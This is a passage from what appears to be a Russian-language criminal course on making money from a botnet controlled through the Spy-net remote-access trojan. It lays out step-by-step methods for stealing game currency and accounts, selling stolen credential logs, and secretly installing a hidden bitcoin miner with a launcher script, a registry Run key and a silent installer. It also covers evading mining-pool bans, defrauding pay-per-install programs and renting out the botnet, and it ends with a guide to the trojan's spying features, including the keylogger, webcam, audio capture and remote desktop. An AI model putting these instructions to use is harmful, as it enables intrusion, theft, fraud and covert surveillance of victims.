данной игры. Эти персонажи будут служить в качестве копилки для нашей валюты.
Либо можно просто записывать акк жертвы, количество средств на аккаунте и сервер. Таким макаром передавать средства игроку сходу с аккаунта жертвы, но минус здесь в том, что когда жертва играет мы не сможем зайти, а как следует, мы не сможем передать игровую валюту в хоть какой момент.

Так же имеет огромную роль сама передача этой валюты снутри игры.

Одни из самых распространёных методов это через аукцион, гильдию либо торговлю.

Приведу примеры:

Аукцион. Мы заходим на акк нашей жертвы и смотрим количество средств на
аккаунте, запоминаем. Дальше заходим на нашего персонажа-копилку, идём на аукцион и размещаем какую-нибудь мелочь цена, которой будет равна сумме, которая
имеется на аккаунте нашей жертвы. Всё, расположили… Снова заходим на акк нашей жертвы, идём на аукцион и покупаем вещь, которую расположили при помощи персонажа-копилки. Сейчас все средства утекли к нашему персонажу.

Гильдия. Заходим на акк жертвы и выходим из гильдии, если естественно он состоит в гильдии. Дальше с нашего персонажа-копилки создаём гильдию и приглашаем туда
персонажа жертвы. Снова заходим на акк жертвы, вступаем в гильдию и пополняем
её счёт на все средства жертвы.

Самое принципиальное! Что бы жертва не заподозрила излишнего запоминайте где стоял персонаж
при заходе в игру и при выходе пытайтесь возвращать его на то же самое место.
Плюсы данного способа в том, что жертва не соображает, куда девались её средства и
списывает это на игрвой баг, что минимизирует риск подозрения на «вредоносное ПО». В конце концов это игра и пропаже игровых средств расстраиваются намного меньше, чем пропаже игрового аккаунта 😉

Кража игровых аккаунтов.

Данный метод мало легче в реализации и для него не требуется много времени.
Для начала так же нам необходимо избрать игру по которой мы будем работать.
Рекомендую выбирать самые известные и крупнозаселённые игры, такие как Wow, Aion,
Lineage 2, WoT.

Как распространять бэкдор вы уже понимаете. Дальше начинаем собирать плоды.
Устанавливаем клиент игры и просматриваем аккаунты наших жертв. Лучше
установить клиент на дед либо виртуалку с внедрение прокси либо VPN.

Нас заинтересовывают аккаунты, чьи уровни достигнули более половины наибольшего
уровня (к примеру — масимальный уровень 80, означает избираем аккаунты, чьи уровни
больше 40). Чем больше уровень, тем дороже акк.

Продавать лучше по заниженной стоимости, т.к для нас принципиально реализовать как можно
резвее.

Для продаж можно воспользоватся особыми сервисами-посредниками, но они
имеют ряд минусов, к примеру некие требуют подвердить паспортные данные, хотя
это не неувязка — подвердить левые данные, но лишняя марока.

Но так же есть сервисы, которые располагают ваши объявления без всяких проверок.
Так же можно продавать самым обыденным методом, распространяя объявление о
продаже персонажа в соц сетях, на игровых форумах, досках объявлений в
любом случае клиент найдёт вас, это вопрос времени. Чем больше объявлений, тем резвее можете реализовать.

Здесь есть несколько подводных камешков:

1. Перед тем как продавать акк необходимо поменять пароль от аккаунта жертвы , от
почтового ящика и отложите его на неделю. Если при всем этом за данный срок жертва не вернула доступ, то вероятнее всего он не может этого сделать или ему просто плевать на акк. Такие аккаунты мы можем продавать с наименьшим риском, что жертва восстановит доступ.

(Если же у вас нет ни капли совести, то некие могкт надумать продавать сходу,
поменяв пароль за ранее перед продажей, но таким макаром есть шанс что
жертва восстановит доступ и таком образом наш клиент который заплатил средства
за акк его растеряет. Очень не советую так поступать!)

2. После смены пароля жертва может заподозрить неладное и начать кропотливо
исследовать собственный компьютер на наше «вредоносное ПО» почти всегда их
пробы окажутся напрасны, но никогда незнаешь как глубоко он зароется и есть шанс
того что жертва решит переустановить винду что гарантированно убьет наш
бэкдор на его ПК.

3. Проверки со стороны покапателя. Проверки различные и всякий раз всё более
изащрёней. Инспектируют последние заходы IP, требуют выслать фото паспортов с
пропиской и с вашей распиской от руки. Естественно, большая часть с лёгкостью обходятся, но такие покупатели обычно очень мелочны. Лично я даже не растрачивал на таких время.

ПРОДАЖА ЛОГОВ И АККАУНТОВ

Это, пожалуй, самый распространёный вид деятельности через ботнет.

Для тех, кто незнает, логи — это текстовой файл, содержащий внутри себя подробную
информацию о каждом действии нашей жертвы. Проще говоря, вся та информация,
которую собирает наш кейлоггер либо стилер.

Логи можно продавать как они есть, т.е в таком виде в каком они приходят вам на ftp-сервер, а можно делать подборку в логах. Любой из методов отлично окупается, но в каждом есть свои минусы и плюсы.

Продажа логов в чистом виде.

Сущность состоит в том, чтоб продавать логи которые нам приходят на ftp. Проще
ничего не придумаешь, единственное что от нас требуется так это перед продажей
избрать подходящий размер файла логов. Стоимость находится в зависимости от размера файла логов и свойства
логов. Качество находится в зависимости от того чем были сняты логи. Логи снятые кейлоггером еще дешевле логов которые были сняты стилером либо грабером.

Кейлогер собирает всю информацию (подходящую и ненадобную), куда зашёл, что написал,
т.е сильно много мусора и ненадобной нам инфы. Покупателя заинтересовывают в
основном только аккаунты и платёжная информация.

Стилер либо граббер собирает и крадёт из браузеров только пароли и логины от
разных ресурсов. Таковой вариант комфортен нам и покупателям, не надо копатся в
логах что бы отобрать аккаунты.

Сейчас побеседуем о стоимости.

Главные аспекты действующие на стоимость логов:

1. При помощи чего были сняты логи. Как уже писал выше логи с кейлоггера наименее качествены потому стоят они дешевле чем логи снятые стилером либо граббером.

2. Страна логов. А поточнее количество государств с которых были сняты логи. К примеру если в логах только информация юзеров одной страны (например Рф) то такие логи стоят дороже. Если же в логах информация о юзерах с различных государств, то такие логи называютмя Микс и соответсвенно стоят дешевле.

3. Чек логов. Логи которые не были использованны стоят дороже чем логи в каких
покапались и собрали все сливки. Хотя здесь больше дело за вашей совестью.

Средняя стоимость за 1мб логов с кейлоггера — 10-15р.
Средняя стоимость за 100 кб логов со стилера либо грабера — 150-300р.

Продажа отдельных аккаунтов.

Если вам не жаль собственного времени, то можно покапатся в логах и накопать много чего увлекательного. Поверте ваше время окупится.

Так же как в первом варианте логи можно продавать но с подборкой (это стоит ещё
дороже), т.е покупателю необходимы аккаунты определённого веб-сайта. Находить их лучше в
собственной базе при помощи специального чеккера. Но в таком случае ваша база становится
юзаная и чеканая.

Но заместо того что бы ожидать клиента который попросит подборку можно чекнуть свою
базу на акаунты самых распространёных ресурсов и подать объявление о продаже
аккаунтов тех либо других веб-сайтов. Поверте некие аккаунты в единичном экземпляре
стоят больше чем вся ваша база.

Самые ценные аккаунты таких ресурсов как — почтовики, социальные сети, веб
аукционы, электрические кошельки, игровые сервера, админки веб-сайтов и серверов,
разные форумы (в главном это закрытые форумы либо форумы по заработку где
ценится репутация и дата регистрации)

Самые покупаемые аккаунты:

— Yandex.ru (почта, кошелёк)
— Гугл.com (почта, соц сеть, канал)
— Mail.ru
— Webmoney.ru (Mini)
— Vk.com
— Facebook.com
— Odnoklassniki.ru
— Instagram.com
— Twitter.com
— Ebay.com
— Molotok.ru

Так же отлично покупаются админкаи веб-сайтов, и аккаунты карж, хакерских, спамерских
форумов в особенности закрытые. На таких веб-сайтах очень ценнится дата регистрации и
репутация, а на некие из их просто так не попасть. Но… люди с таких форумов прошарены и аккаунты данных систем попадаются очень изредка.

Принципиальный МОМЕНТ: До того как продавать аккаунты просмотрите их в ручную,
время от времени попадаются очень ценные акаунты, в особенности в соц сетях. К примеру
аккаунты админов больших групп либо аккаунты с огромным количеством
друзей и подписок. Думаю такие аккаунты не достаточно кто не сумеет использовать для себя в
пользу;)

МАЙНИНГ БИТКОИНОВ

Многие из вас отлично представляют, что такое биткоины и как его добывать. Но т.к курс нацелен на новичков и они наверное находятся то будет не излишним упомянуть что же все-таки это такое.

Биткоин (bitcoin) – это цифровая валюта (криптовалюта). Биткоины добывают при помощи программы-клиента которая за счёт ресурсов компьютера расчитывает заглавия хэшей блоков, за расчёт которых и даются биткоины. За генерацию 1-го блока даётся 25 монет. Сама добыча биткоинов именуется «майнингом» что в переводе значит добычу либо же горным/шахтёрским делом.

Майнинг биткоинов как раз отлично сравним с шахтёрским ремеслом. Майнеры (т.е мы) это шахтёры, а биткоины это руда (допустим золото). Одному добывать руду согласитесь трудно, потому майнеры соединяются воединыжды в группы (пулы) где вся добыча распределяется поровну меж рабочими. И чем поглубже мы копаем шахту тем труднее добывать руду, плюс ко всемус каждым днём у нас становится больше соперников которые так же пришли добывать эту же руду, которая кстати не нескончаема.

Но мы же с вами не какие-то там шахтёры которые трудятся денек и ночь что бы получить священную копеечку за собственный труд. Для нашей цели мы завербуем несколько сотен, а может и тыщ рабов которые будут делать за нас «грязную работу» полностью безвозмездно! Сначала нам необходимо обусловится с клиентом при помощи которого мы будем майнить через наших роботов. Таких программ предостаточно, но на мой взор лучше использовать Phoenix 2.0.0.

Данная программка прилагается к курсу, а скачать её можно тут —
https://bitcointalk.org/index.php?topic=75786

Скачали, сейчас запускаем файл phoenix.exe и у нас возникает файл phoenix.cfg. Это файл конфигурации нашего майнера. Открываем его.

В него нам необходимо прописать характеристики майнинга. Они должны смотреться так:
[general]
autodetect = +cl –cpu
backend = http://user@host:port
backups = http://user@host:port
logfile = log
[cl:0:0]
autoconfigure=true
aggression = 5

Строчка «autodetect» показывает при помощи чего мы будем майнить.

Майнить можно 2умя методами – при помощи CPU (Микропроцессор) и GPU (Видеоплата). Как
правило у графических адаптеров производительность больше, потому мы указываем параметр «cl»
который как раз обозначает видеоплату.

При помощи строк «backend» и «backups» обозначаются адреса пула, основного (backend) и запасного (backups). Нам необходимо поменять значения http://user@host:port на ваш адресок в пуле.

Всё что под строчкой [cl:0:0] относится к графическим характеристикам которые назначают
нагрузку на видеоплату/микропроцессор. Строчка «aggression» назначает скорость с которой будет майнить наша видеоплата либо микропроцессор. Чем больше скорость тем выше нагрузка. Не рекомендую ставить параметр «aggression» больше 5, по другому наши жертвы усвоют что с их компьютерами что-то неладное из-за большой и нередкой нагрузки на их видеоплаты. С опциями разобрались. Дальше нам необходимо избрать пул через который мы будем майнить.

Если кратко, то пул это сервер где соединяются воединыжды огромное количество юзеров которые
сразу генерируют блок после этого заслуга распределяется поровну меж всеми участниками процесса.

Лично я рекомендую по многим причинам пул 50btc.com. Думаю практически все кто майнит либо пробовал майнить в Рф употребляют конкретно его.

Другие пользующиеся популярностью пулы:

http://mining.bitcoin.cz
https://deepbit.net
http://bitminter.com
https://www.btcguild.com
http://btcmine.com

Регистрируемся в нём и получаем адресок который мы вписываем в файл phoenix.cfg в строчках «backend» и «backups». Вот вам наглядный пример как это должно смотреться:

Ботнет

Т.е запасные адреса в пуле 50btc которые должны находится в стоке «backups» смотрятся так — pool2.50btc.com и pool-us.50btc.com.

Майнер настроен и готов к работе! Сейчас нам необходимо установить его нашим жертвам.

1-ый метод.

Данный метод востребует много времени т.к данную операцию будет нужно применить к
каждому боту персонально.

Открываем наш Spy-net. Выделяем бота, жмём правой кнопкой мыши по нему и избираем
самый 1-ый пункт – «file manager»

Ботнет

Раскрывается менеджер файлов. Сверху избираем пункт %WIN% и мы перебегаем в
папку Windows. (Можно избрать всякую папку, принципиально что бы юзер не нашёл вашу папку с майнером).

Ботнет

Жмём правой кнопкой мыши по хоть какой папке в менеджере файлов и избираем пункт
«Create folder» и создаём папку. Папку можно именовать как вам комфортно, главное что бы это был не тупой набор букв с цифрами. Жмём Refresh.

Ботнет

Сейчас в нашу папку заливаем файлы майнера, для этого жмём правой кнопкой мыши и
избираем пункт «Send file». Сейчас майнер на компьютере жертвы. Осталось сделать так что бы он запускался автоматом в сокрытом режиме.

Для этого нам необходимо сделать скрипт и прописать его в реестре. Делается это просто. Создаём txt файл и прописываем там 2 строки

var WSHShell = WScript.CreateObject(«WScript.Shell»);
WSHShell.Run(«название файла»,0);

Где «имя файла» указываем экзешник нашего майнера Phoenix.exe. Для наименьшей
палевности можем переименовать сам майнер под какую-либо системную службу.
Сейчас сохраняем наш txt в форме «имя файла.js», таким макаром получаем готовый
скрипт.

Последнее что нам осталось это прописать его в реестре жертвы.

Выделяем бота и жмём правой кнопкой мыши. Избираем пункт «Registry editor» и
раскрывается редактор реестра.

Перебегаем — HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Win
dows\CurrentVersion\Run

Жмём правой кнопкой мыши по правому полю и избираем «New – String value»
Раскрывается окно где в поле name указываем имя параметра, а в поле data указываем путь на компьютере жертвы к нашему скрипту. Рекомендую всегда ложить скрипт в одно место что бы не запутаться.

Сейчас наш майнер всегда запускается при включении компьютера в сокрытом режиме.
Майнер можно узреть исключительно в процессах диспетчера задач, если его переименовать в какой-нибудь из системных файлов то жертва никогда его не найдёт. В принципе если даже файл бросить с необычным заглавием врятли он попадётся на глаза нашей жертве, ведь не достаточно кто роется в диспетчере задач для поиска излишних работающих процессов.

2-ой метод.

Данный метод подойдёт для массовой загрузки майнера нашим ботам.

Для этого необходимо сделать инсталлятор для распаковывания нашего майнера в сокрытом
режиме и прописки его в реестр.

Для этого можно пользоваться хоть какими схожими упаковщиками, но я приведу
пример на уже нам знакомом Smart Install Maker.

Открываем. В меню Информация. Нам необходимо поменять заглавие и избрать путь
сохранения инсталлятора. Заглавие придумываем хоть какое (главное что бы это не было
бессмыслицой), все пункты – версия, компания, веб-сайт, поддержка заполняем по собственному
усмотрению и в графе «сохранить как» удачный вам путь для сохранения
инсталлятора. Тип сжатия оставляем без конфигураций.

Ботнет

Перебегаем в меню Файлы. В меню в правом нижнем углу есть ярлычек – «добавить файлы из папки», жмём на него. Находим папку с нашим майнером и жмём ОК. Все файлы нашего майнера добавились в перечень файлов. Сейчас избираем директорию, куда будет извлекаться наш майнер после установки.

Я рекомендую использовать директории — %AppData%,%ProgramFiles%,%SystemDir%,%Wind
owsDir% (это папки, куда будет установлен майнер) и избираем существующую папку в данной директории. К примеру — %ProgramFiles%\Windows Life

Всё остальное оставляем как на снимке экрана: Если файл существует: Поменять
Снимаем галочку с пт – Деинсталлировать Перебегаем в меню Требования.
Ставим галочку в пт «Закрыть запущенные приложения». В строке «Искомая строка»

прописываем — Phoenix.exe. В строке «Тип поиска» избираем – название файла приложения.
Меню Диалоги. Здесь нам нужно только поставить галочку над самым верхним пт — «Скрытая установка». Меню Реестр. В нижнем меню справа есть ярлычек – «Добавить».
Жмём по нему и всплывает окно. Корневой ключ указываем – HKEY_LOCAL_MACHINE
Подключ указываем — SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Параметр сможете указать хоть какой. Тип значения оставляем так же. В Значение прописываем путь распаковки — %ProgramFiles%\Windows Life И убираем галочку с пт «Деинсталлировать»

Ботнет

Меню Команды.

Снова же в правом нижнем меню находим ярлычек «Добавить» и жмём по нему и раскрывается окно. В строке Тип команды оставляем «приложение»
Справа от строчки «Команда» находим ярлычек – «выбрать файл из перечня применяемых файлов», жмём по нему и избираем из перечня строчку с окончанием phoenix.exe
Характеристики оставляем пустыми. Запускать как – избираем «Hide». Когда делать – избираем «после распаковки» Меню Деинсталлятор – Опции. Снимаем галочку с пт «Создать деинсталлятор». С опциями окончили, сейчас жмём в верхнем меню на ярлычек «Компилировать» и создаём наш инсталл файл. Сейчас данный инсталл нам нужно установить ботам.

Ботнет

Всё до боли просто, заходим в Spy-net, выделяем наших роботов, жмём правой кнопкой мыши и избираем пункт – Send file and -> Run hidden и избираем из перечня наш инсталлятор. Таким макаром, он скачается, установится и запустится в сокрытом режиме.

Ботнет

Обход банов

Все большие пулы знают о ботнетах и потому очень плохо относятся к ботоводам. Если у вас будет серьёзная сеть из роботов и вы собираетесь отправиться майнить на большой пул, то навряд ли у вас что-то из этого выйдет. Но есть некие методы которые посодействуют вам избежать банов.

1. На больших пулах сильно много майнеров и потому им трудно уследить за некими из их. Но если один майнер выделяется своими мощностями, то такового майнера просто увидеть, а если его увидят то и увидят тот факт что к его воркеру обращаются несколько сотен IP адресов, это может гласить о том что добыча биткоинов идёт от нескольких сотен компов сходу а не от 1-го юзера. Естественно такие воркеры сходу замораживаются до выяснения обстоятельств.

Для того что бы таких ситуаций не появлялось наших роботов необходимо поделить по учётным записям. Т.е на одну учётную запись необходимо выделять определённое количество роботов. Возьму в пример пул 50btc. Среднее количество роботов на 1 учётную запись менее 30 роботов и мощность менее 1 Gh/sek. Если следовать строго таким аспектам то заморочек с заморозкой не возникнет, по последней мере у меня таких заморочек не появлялось. Да единственная неувязка в том что если у вас огромное количество роботов, необходимо создавать много учёток, но пока вы набираете обороты и на исходном шаге у вас будет не настолько не мало роботов, то и учёток не надо создавать десятками в денек. А когда вы уже отлично разгонитесь то можно будет пошевелить мозгами и о своем пуле для собственных роботов.

2. Т.к мы позиционируем наш ботнет как законный, так почему бы нам не
пользоваться нашим соглашением. Если честно с лицензионными соглашениями я
начал работать только из-за майнинга.

Если нашу учётную запись заморозили, то единственным шансом для её разморозки
служит разговор с саппортом либо администрацией пула.

Без матов, без оскорблений и обвинений описываем ситуацию что имеете соглашение с
юзерами у каких установлен майнер с нашими данными и что эти юзеры в курсе что с их помощью машин делается майнинг биткоинов и предоставляем им наше соглашение, инсталлятор и источник откуда скачивается инсталлятор (инсталлятор следует переработать под открытую установку и перезалить).

После некого времени (обычно от суток) наш акк размораживают. Были случаи
когда саппорт вообщем не реагирует. В таких случаях идеальнее всего писать им мыло либо в социальные сети.

НАКРУТКА ПАРТНЁРСКИХ ПРОГРАММ

Наверное многие из вас сталкивались и пробовали (вероятнее всего некие и
зарабатывали) заработать на ПП(партнёрская программка).

ПП бывают различных направлений – с оплатой за клик (PPC), с оплатой за действие (CPA) и т. д, но мы побеседуем о ПП с оплатой за загрузку (PPI).

Главные ПП с оплатой за установку по руинтернету это – Profitraf.ru и Loadmoney.ru
Мы разглядим Profitraf.ru.

Начнём с того, что бы нормально работать с данными ПП нужен веб-сайт с загрузочным
трафиком, т.е хоть какой веб-сайт где выложены различные софтины, игры и т.д.

Не непременно иметь пользующийся популярностью веб-сайт. Можно наклепать для себя веб-сайт на юкозе и залить
несколько 10-ов программ.

Т.к наш трафик будет идти с ботнета, то веб-сайт нам нужен только для видимости того что у нас есть площадка откуда мы сливаем трафик (Хоть наши боты являются живым и
мотивированным трафиком, но знать о том что траф идёт с ботнета администрации ПП не
стоит)

Итак, сделали веб-сайт, залили туда несколько программ – готово!

Сейчас перейдём к регистрации.

Для регистрации в Profitraf.ru нужны инвайты(приглашения). Добыть их легко, довольно перейти на веб-сайт – Profitraf-invite.ru, ввести туда своё мыло и мгновенно
получить инвайт.

С регистрацией думаю всё понятно.

После регистрации нам необходимо добавит наш веб-сайт. Перебегаем в меню «сайты» заполняем
все поля и для их проверки не забываем добавить файл «a4dadd7.html» в корневую папку (основная папка где находятся другие папки и файлы) вашего веб-сайта.

Обычно ожидать доказательства приходится не больше суток.

Когда ваш веб-сайт подтвердили, перебегаем в меню «установка кода».

Сущность в том что бы поменять код для скачки наших файлов с заменой их домена.
Весь процесс смены кода я обрисовывать не стану, там всё тщательно описано (если вы сделали веб-сайт на юкозе, то для таких веб-сайтов там есть отдельные опции).

Итак, сменили коды, сейчас нам необходимо лить трафик на наши загрузки. Для этого выделяем роботов (не рекомендую загружать файлы большенными пачками роботов, т.к за этим могут смотреть) и избираем пункт «Download and execute file».

Ботнет

В показавшемся окне вписываем прямую ссылку на скачка и жмём ОК, после этого всплывёт окно которое спросит — «Вы желаете запустить в сокрытом режиме?». Жмём «Yes».

Такие махинации можно сделать с хоть какими PPI партнёрками, не советую ограничиваться одной ПП, т.к трафик у нас есть всегда и ПП с каждым месяцем становятся всё больше.

Ботнет

СДАЧА В АРЕНДУ

Если у вас набралась благопристойная сеть из роботов и вам лень что-либо делать либо
выдумывать как на их заработать, то самый обычный метод это просто сдать в аренду. Либо как вариант можно собирать роботов себе и раздельно для аренды. Но самое увлекательное что сдав его в аренду вы всё равно можете им воспользоваться (только арендатору знать об этом не непременно).

Сейчас побеседуем о стоимости. Лучшая стоимость сдачи ботнета в аренду – 10-15 рублей за бота. Но предложений о сдаче в аренду ботнета сильно мало и потому стоимость можно и завысить. Стоимость сможете ставить зависимо от вашего аппетита, но не меньше 10р за бота.

Сейчас подсчитаем… набрать сеть из роботов в количестве нескольких тыщ можно в месяц (если при всем этом делать каждый денек деяния по распространению бэкдора).

Ну например возьмём самое маленькое – 1000 роботов в месяц по 10р за бота = 10000р за месяц. Даже такая стоимость за месяц хорошее вознаграждение в месяц стараний, беря во внимание что далее вы уже сможете и практически ничего не делать (разве что только обновлять бэкдор) и сдавать ботнет далее. В данном деле вас никто не ограничивает в числах, вы сможете ставить стоимость больше, сможете далее увеличивать сеть.

ЭПИЛОГ

Ко всему этому желаю добавить, что сейчас у вас в руках есть уникальный инструмент
который подходит как для зарабатывания средств, так и для иных шалостей. Те методы заработка которые представлены в курсе это малая толика всех методов которые есть и ещё можно придумать. Да многие из методов требуют особых функций которыми данный бэкдор не обладает. Но с уверенностью скажу что не существует троянов которые владеют всеми функциями сходу.

Зато бэкдор обладает функцией закачивания файлов жертве. Так что никто не мешает
подкинуть вашим ботам новых троянов с другими функциями. Это могут быть грабберы
определённых ресурсов (банков, веб-сайтов), наркрутчики (голосований, просмотров, уников), спамеры, ДДОСеры и т.д. Простор для фантазии безграничен.

С каждым годом возникают новые виды заработка в сети и при помощи ботнета всегда
можно будет заработать на новых темах по заработку.

Над построением собственной сети из роботов необходимо работать каждый денек, как и всюду. Что бы достигнуть фуррора необходимо трудится каждый денек. Чем больше дней вы уделяете работе с ботнетом, тем больше у вас будет сеть из роботов и соответственно тем больше у вас будет доход. Каждый новый бот это «рубль» в ваш кармашек.

Чем больше роботов и источников дохода подключённых к ним, тем больше вы заработаете. Если один источник дохода исчерпает себя отыскиваете новый источник. Ведь у вас есть инструмент который способен откачивать ресурсы практически откуда угодно. Самое увлекательное что при помощи нашего инструмента можно откачивать ресурсы сходу из нескольких мест. Самое главное как — это перебороть свою лень и идти к успеху.

Да кому то это будет не просто, но до того как мыслить что это трудно, задайте для себя вопрос — а всё вы делаете для того что бы вам стало легче и много ли вы времени уделяете этому делу? Чем больше вы будете трудится и уделять времени построению собственной сети тем резвее она будет расти! Запомни!

Дополнение

Как мы сделали бэкдор и появились 1-ые боты встаёт вопрос — как управлять ими и какими функциями обладает сервер.

В окне клиента Spy-net выделяем хоть какого бота и кликаем по нему правой кнопкой мыши.

Ботнет

Лицезреем длиннющий список. Это всё функции управления нашими ботами. Разберём их в всех по порядку!

1.«File manager»

Нажав на данный пункт, раскрывается менеджер файлов нашего бота.

Ботнет

Сверху находятся 2 вкладки – «file manager» и «search file». 1-ая вкладка это сам менеджер файлов, а 2-ая вкладка понадобится для поиска подходящего файла, необходимо просто ввести заглавие подходящего файла, всё просто.

Под вкладкой «file manager» лицезреем 2 адресные строчки для резвого перехода к
стандартным папкам.

%WIN% — папка «WINDOWS»
%SYS% — папка «System32»
%RECENT% — недавнешние файлы и документы
%DESKTOP% — десктоп
Локальные диски и съёмные носители

Выберем C:\ — Local Disk. В адресной строке появился путь – C:\ и открылась папка локального диска. Нажав правой кнопкой мыши по подходящему файлу либо папке
раскроется меню управления файлами. Разглядим его более тщательно:

Ботнет

Refresh — обновить перечень файлов и папок;
List shared network folders — получение перечня расшаренных ресурсов сети.
Перечень добавляется в левое меню в шапке ФМ;
Download folder — скачать папку;
File download — скачать файл;
File download(recursive) — скачка файла, сохраняя структуру папок;
Send file — загрузить файл;
Send file(FTP) — выслать файл на FTP-сервер.
Add to download list — добавить в перечень загрузки. Загрузки не произойдет, клиент
будет ожидать вашей команды на начало загрузки. Файл попадет в нижнюю часть ФМ;
Run — пуск файла. Есть 2 варианта: в сокрытом режиме и обыкновенном;
Delete — удалить файл;
Rename — переименовать;
Copy — копировать;
Paste — воткнуть;
Create folder — сделать папку;
Set as wallpapper — установить картину как обои десктопа;
Show image — просмотреть картину. В нижней части в черном квадрате
отобразится набросок этого изображения;
Attributes — смена атрибутов файла;
Open folders of downloads — раскрывается окно с тем, что вы скачали с файловой
системы жертвы. Фактически тут будут лежать все скаченные файлы. В том
числе и лог кейлоггера.

В нижней части менеджера файлов имеется поле всех отправленных и скаченных файлов.

Ботнет

В этом поле так же имеются свои пункты для управления файлами:

Pause the transfer — приостанавливает загрузку файла(папки);
Start/Restart the transfer — начало загрузки;
First position — переместить на первую позицию перечня;
Up a – поднять ;
Down position – ввысь на позицию;
Last position — на последнюю строку перечня;
Delete transfers complete — удалить из перечня завершенные загрузки;
Delete transfer — удалить закачку;
Stop download folder — приостановить закачку папки;
Open folders of downloads — раскрывается перечень скаченных файлов у жертвы.

2.«Keylogger»

Кликаем по меню «Keylogger» и раскрывается окно. Здесь всё просто и понятно.

Ботнет

Справа лицезреем 4 пт:

Download — скачать с жертвы текущий лог;
Delete — удалить текущий лог;
Save — сохранить лог в текстовом формате;
Disable — отключить ведение лога кейлоггером;

Сходу замечу, что в кейлоггере есть один недочет – не соображает кириллицу.
Идеальнее всего не поскупится, заказать обычный кейлоггер и закинуть вашим ботам.

3.«Registry editor»

Выбрав меню «Registry editor», у нас раскрывается редактор реестра нашего бота.
Здесь всё как в обыкновенном редакторе реестра.
Для сотворения ключа жмём правой кнопкой мыши и избираем пункт «New»:
«String» Value – строковый параметр
«Bynary» Value – двоичный параметр
«DWORD» Value – параметр DWORD (32 бита)
«Multi-String» Value – мультистроковый параметр

Ботнет

4.«DOS Promt»

При открытии возникает пустое окно. Жмём правой кнопкой мыши по пустому окну для
открытия меню.

Ботнет

Разберём пункты меню:

Enable — активировать DOS;
Disable — деактивировать DOS;
Save — сохранить содержимое окна;
Exit — выход.

P.S: Это не функция DDOS атаки. Это командная строчка DOS.

5.«Clipboard»

Данное меню открывает нам содержание буфера обмена жертвы. Для тех кто не знает, буфер обмена – это скопированная часть инфы (файл, текст) для того что бы воткнуть в необходимое место. Что бы узреть буфер обмена нашего бота необходимо надавить кнопку «refresh» в правом нижнем углу. А для того что бы поменять буфер обмена нашего бота нажмите кнопку «Set» и установите своё значение.

Ботнет

6.«Device list»

В данном меню мы лицезреем перечень установленного оборудования на ПК бота.

Ботнет

7.«Active ports list»

После того как наше окошко раскрылось жмём кнопку «refresh» и мы лицезреем перечень
открытых портов. Так же в данном окне можно узреть информацию о локальном и
наружном IP адресах, протокол, статус портов и процесс через который открыт порт.
Красноватой строкой выделен наш сервер.

Ботнет

Нажав правой кнопкой мыши по хоть какой строке, появится меню:

Refresh — обновить окно;

DNS resolve — поменять вид удаленного IP на его DNS записи. После установки этого параметра, нужно обновить окно;

End connection — закрыть подключение;

Kill Process — убить процесс, который открыл порт;

Exit — выход.

8.«Installed Programs»

Выбрав пункт «Installed programs» в правом нижнем углу жмём по кнопке «refresh» и возникает перечень установленных программ. Кликнув правой кнопкой мыши по
программке появится меню:

Ботнет

Resfresh — обновить окно;
Uninstall — удалить программку. Появится окно удаления программки в открытом режиме. Палево со стороны бота гарантированно;
Exit — выход.

9.«Windows list»

В этом меню мы лицезреем весь перечень окон нашего бота.

Ботнет

Кликнув правой кнопкой мыши по окну раскроется меню:

Refresh — обновить окно;
Close — закрыть окно;
Maximize – развернуть окно на весь экран;
Minimize — свернуть на панель задач;
Show/Restore — показать/вернуть;
Hide — упрятать;
Minimize all — свернуть все окна на панель задач;
Rename — переименовать окно;
Lock button [X] «Close» — запретить закрытие данного окна;
Unlock button [X] «Close» — разрешить закрытие данного окна
Exit — выход.

Те окна которые выделены сероватым – запущены в сокрытом режиме либо свёрнуты.

10.«Service list»

В этом меню мы лицезреем все запущенные сервисы нашего бота.

Ботнет

Так же можно узреть какие из их запущены по статусу. Кликнув правой кнопкой мыши на службе, открываем меню:

Refresh — обновить окно;
Start — пуск сервиса;
Stop — остановка сервиса;
Uninstall — удалить сервис;
Install — установить сервис. Указываем заглавие сервиса, его описание, и путь к файлу;
Exit — выход.

11.«Processes list»

В этом меню мы лицезреем все запущенные процессы нашего бота. Данное меню чем то похоже на диспетчер задач с одной только различием – нельзя удалять и устанавливать.

Ботнет

12.«Capture audio»

Данная функция позволяет захватить звук с компьютера нашего бота. Т.е мы можем
прослушивать то что слушает на данный момент наша жертва. Прослушивать мы можем конкретно то,
что воспроизводится на компьютере на этот момент, а не то что происходит в его
комнате прослушивая через микрофон.

Ботнет

В этом меню можно выставлять частоту канала и качество звука.

13.«Remote Desktop»

Эта функция позволяет захватить деяния десктопа в реальном времени.

Ботнет

Следя за рабочим столом бота он ничего не увидит и не заподозрит. В левой части у нас имеются 3 кнопки:

Single — единожды обновляет окно. Нажали — обновили;
Start — запустить неизменное обновление окна;
End — приостановить неизменное обновление окна.

Под клавишами лицезреем поле «Interval». Здесь задаётся интервал сохранения кадров. Поставив галочку в пт «save» и выбрав определённый интервал, бэкдор начнёт скринить десктоп через определённый интервал и все снимки экрана будет кидать в папку «Desktop» которая будет находится в папке нашего клиента spy-net.

Понизу есть пункты «Mouse» и «Keyboard». Выбрав их мы сможем управлять рабочим
столом жертвы при помощи наших мышки и клавиатуры, но наш курсор не будет виден
жертве.

Шкала с ползунком понизу регулирует качество отображения десктопа. Чем выше
качество, тем больше изображение будет подтормаживать.

14.«Capture Webcam»

Данная функция позволяет совершать захват изображения с вебкамеры.

Ботнет

Окно похоже на предшествующее окно захвата десктопа. Слева так же есть кнопки:

Start — пуск захвата вебкамеры;
End — остановка захвата вебкамеры;

Так же как и с функцией захвата десктопа, здесь можно сохранять кадры. Избираем интервал и ставим галочку в пт «save».

15. «Extra options»

Это меню является что-то вроде дополнительных функция для управления. Здесь 3 вкладки с различными функциями.

Message box
Miscellaneous
MSN messenger

Итак, разберём каждую. «Message box»

Данная функция быстрее никчемная. Она позволяет отправлять жертве сообщения в
виде оповещений об ошибках. Подобная функция была при разработке сервера.

Ботнет

«Miscellaneous»

Данная функция тоже не настолько нужная, но зато можно позабавить себя. При помощи этой функции можно управлять ПК жертвы – выключить либо перезагрузить ПК либо же выключить монитор. Весь перечень функций:

Start button – прятать/перекрыть меню Запуск
Desktop icons – прятать/перекрыть иконки на десктопе
Taskbar — прятать/перекрыть панель задач
Mouse and keyboard — перекрыть мышь и клавиатуру
System tray icons – прятать иконки из системного трея
Disk tray — открывать/закрывать лоток CD-ROM

Ботнет

«MSN messenger»

